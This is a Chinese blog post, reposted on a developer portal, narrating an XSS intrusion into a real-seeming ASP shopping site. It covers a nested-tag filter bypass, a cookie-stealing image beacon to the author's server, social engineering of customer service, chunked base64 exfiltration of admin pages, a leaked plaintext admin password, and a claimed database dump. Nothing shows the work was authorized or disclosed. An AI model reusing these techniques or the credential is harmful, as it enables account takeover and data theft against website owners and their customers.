首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

黑客渗透笔记 XSS跨站黑盒入侵实战

黑客渗透笔记 XSS跨站黑盒入侵实战

黑客花无涯 带你走进黑客世界系列文章

学习黑客经典书籍 网络黑白 某宝有售

现在注入越来越少了,于是XSS入侵开始成为热门的手法了,记录一个XSS手法CRSF入侵的实例,朋友接了一个购物商城的单子,让我帮忙一起看看,独立服务器,用的老旧的ASP语言的程序,不是主流的CMS系统或者购物系统,我想应该是自己开发的吧。

在一般的xss检测过程中,安全研究人员或者是黑客,通常会使用最简单的alert(1),来检测当前输入位置是否存在xss。

ps:什么是alert(1)?这是一行简单的jaascript代码,如果正常运行的话,浏览器将会弹出一个对话框。如果你使用的是Chrome浏览器的话,可以尝试着按F12开启开发者选项,在console中输入alert(1)。将会看到如下效果

ASP的漏洞就那么几个,没有啥注入点,所有id都是经过cint处理过的,网站找不到后台。服务器的C段也没有几个网站。想渗透也不好下手。悲剧的,我转了一圈又一圈,也没啥突破口。怪不得叫我看看。重新回到网站。随手注册了个账户,发现可以给管理员留言。看来只有XSS这一条路了。这个留言可以自己查看,修改,删除。这样测试XSS就不怕管理员发现了。

开始测试xss。发现script替换成了空反复测试了下发现huawuya/sscriptcript/sscriptcript替换成为script/script是支持的。于是写了js丢自己空间里面。1.js的内容如下,网址我用我的BLOG替代了:

img=newImage();img.src=网址

给管理员发表留言。

“我下不了订单sscriptcriptsrc=网址heikexiehui/sscriptcript”

等了半天没有cookie上钩,于是我直接找到客服系统跟她说:“我下不了单你去看看,我给你留言了。”然后关闭客服系统。这下没两分钟,cookie来了!

顺利得到后台的地址为Xxaaddmmiinn21012,这谁知道哦。管他了。先进后台再说。

悲剧的是就是进不去。此路不通,得换个思路,既然可以XSS,那要不然,CRSF加入一个管理员进去。可这程序有不开源,想CRSF也得知道后台的结构啊。那先得想办法获得他网站后台的所有链接。于是修改脚本为:

经过漫长的XSS,这样,获取了不少的链接。发现有一个可疑连接为adminlist.asp,通过英文名字,就知道,这个管理员列表的意思,修改XSS代码来获取adminlist.asp的页面源代码。

结果页面太大,不行!get提交数据太多了。

思考了好久。开始想获取一部分,然后在做判断获取另一部分,把他源代码分段get过来,这里就遇到一个问题。如何分段处理,想了好久。决定把代码加密为base64然后分段传输过来,然后在组装成一个源代码透露部分核心代码。代码写的仓储没做算法思考。

这样的base64数据。Id不是序列的主要是因为异步传输有些快有些慢。不过总算是获取回来了。

base64解密整理了下。看来老天眷顾,发现帐号密码。tmd还好不是md5加密的。

Adminshopsexad123adf456gh!@#$

接下来,后台登陆成功,脱数据库了。

学习黑客经典书籍 网络黑白 某宝有售

中国黑客协会 普及网络安全知识,让更多的人学习并重视网络安全和信息安全。

中国黑客协会是一种精神的传承,黑客代表是一种精神,它是一种热爱祖国、坚持正义、开拓进取的精神。

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20180301A0UPNG00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券